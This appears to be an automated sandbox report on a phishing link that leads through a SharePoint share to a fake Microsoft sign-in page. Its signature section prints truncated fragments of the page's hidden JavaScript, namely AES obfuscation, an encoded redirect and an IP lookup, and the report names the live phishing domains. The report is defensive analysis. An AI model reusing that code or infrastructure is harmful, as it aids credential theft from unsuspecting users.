Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2

Overview

General Information

Sample URL:https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nM
Analysis ID:1556067

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected landing page (webpage, office document or email)
HTML page contains suspicious javascript code
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Javascript checks online IP of machine
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,11151296239023348836,12174072739387619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev' does not match the legitimate domain 'microsoft.com'., The domain 'r2.dev' is not associated with Microsoft and appears to be a generic or cloud service domain., The presence of a long alphanumeric string in the subdomain is unusual and can be indicative of phishing., The input fields 'Email, phone, or Skype' are commonly targeted in phishing attempts to harvest personal information. DOM: 3.9.pages.csv
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlJoe Sandbox AI: Page contains button: 'VIEW DOCUMENT' Source: '3.5.pages.csv'
Source: https://vangabouned.top/HTTP Parser: window.location.href = atob(
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: Number of links: 0
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: Total embedded image size: 45708
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.9...
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: Title: Account sign in does not match URL
Source: https://vangabouned.top/HTTP Parser: let current_ip = null;function rtjeq(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "vak9rlbi9fmzzneubmt8vu3v3wmvo4kwmtfqrdb0/crtwotwglpucovoi9+i+dydqoctlyhv819ikruljlx48g==";async function idtw7xtgb() { try { const response = await fetch("htt...
Source: https://vangabouned.top/HTTP Parser: let usuuid = "vak9rlbi9fmzzneubmt8vu3v3wmvo4kwmtfqrdb0/crtwotwglpucovoi9+i+dydqoctlyhv819ikruljlx48g=="; let policy = "pxmvmec2r2ugrndvjdt/6gp5msx1bwn4czrd0lm5xy9mvsoya3rymff+cnjdqdxc";let sv = "0"; let sir = "1"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.par...
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: No favicon
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: No favicon
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: No favicon
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: No favicon
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: No <meta name="author".. found
Source: https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.16:50023 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:50033 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.130:443 -> 192.168.2.16:50050 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: linklock.titanhq.com
Source: global trafficDNS traffic detected: DNS query: myarrowleaf1-my.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: southcentralus0-0.pushnp.svc.ms
Source: global trafficDNS traffic detected: DNS query: r4.res.office365.com
Source: global trafficDNS traffic detected: DNS query: config.fp.measure.office.com
Source: global trafficDNS traffic detected: DNS query: b3417200d409a61b8406c7116155662f.fp.measure.office.com
Source: global trafficDNS traffic detected: DNS query: tr-ooc-atm.office.com
Source: global trafficDNS traffic detected: DNS query: tr-ofc-mira.office.com
Source: global trafficDNS traffic detected: DNS query: westus31-mediap.svc.ms
Source: global trafficDNS traffic detected: DNS query: upload.fp.measure.office.com
Source: global trafficDNS traffic detected: DNS query: spo.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev
Source: global trafficDNS traffic detected: DNS query: vangabouned.top
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: o365.alnassers.net
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50211
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.16:50023 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:50033 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.130:443 -> 192.168.2.16:50050 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@21/176@72/367
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,11151296239023348836,12174072739387619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2016,i,11151296239023348836,12174072739387619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 758Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%250%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dual-spo-0005.spo-msedge.net
13.107.136.10
truefalse
    high
    vangabouned.top
    64.23.155.205
    truefalse
      unknown
      mira-ssc.tm-4.office.com
      52.107.243.199
      truefalse
        unknown
        pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev
